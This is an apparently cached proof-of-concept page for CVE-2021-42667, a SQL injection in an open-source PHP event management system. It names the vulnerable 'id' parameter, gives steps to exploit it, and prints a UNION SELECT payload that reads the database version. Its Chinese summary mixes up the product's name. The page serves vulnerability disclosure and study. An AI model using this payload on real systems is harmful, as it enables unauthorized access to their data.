Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2021-42667 PoC — Engineers Online Portal SQL注入漏洞

Source
Associated Vulnerability
Title:Engineers Online Portal SQL注入漏洞 (CVE-2021-42667)
Description:Engineers Online Portal是开源的一个在线门户。是使用PHP、MySQL 数据库、HTML、CSS、Javascript、jQuery、Ajax、Bootstrap 和一些其他库开发的。 Engineers Online Portal 存在SQL注入漏洞,该漏洞源于事件管理视图中,PHP的Sourcecodester在线事件预订和预订系统存在SQL注入漏洞。攻击者可利用该漏洞来操纵所执行的sql查询,因此他可以从web服务器提取敏感数据以便在远程web服务器上执行远程代码。
Description
CVE-2021-42667 - SQL Injection vulnerability in the Online event booking and reservation system.
Readme
# CVE-2021-42667
CVE-2021-42667 - SQL Injection vulnerability in the Online event booking and reservation system version 2.3.0.

# Technical description:
An SQL Injection vulnerability exists in the Event management software version 2.3.0. An attacker can leverage the vulnerable "id" parameter in the "USER" web page in order to manipulate the sql query performed.
As a result the attacker can extract sensitive data from the web server.

Vulnerable page - USER

Vulnerable parameter - "id"

# Steps to exploit:
1) Navigate to http://localhost/event-management/views/?v=USER&ID=1
2) Insert your payload in the id parameter

# Proof of concept (Poc) -
The following payload will allow you to extract the MySql server version running on the web server -
```
UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL;-- -
```

![CVE-2021-42667](https://user-images.githubusercontent.com/93016131/140189245-95231b03-fb92-419e-922c-74c8752e775f.gif)

# References - 
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42667

https://nvd.nist.gov/vuln/detail/CVE-2021-42667

# Discovered by - 
Alon Leviev(0xDeku), 22 October, 2021. 
File Snapshot

[4.0K] /data/pocs/e16c04b7b6ea4499741358c52915a0a9665a7e05 └── [1.1K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.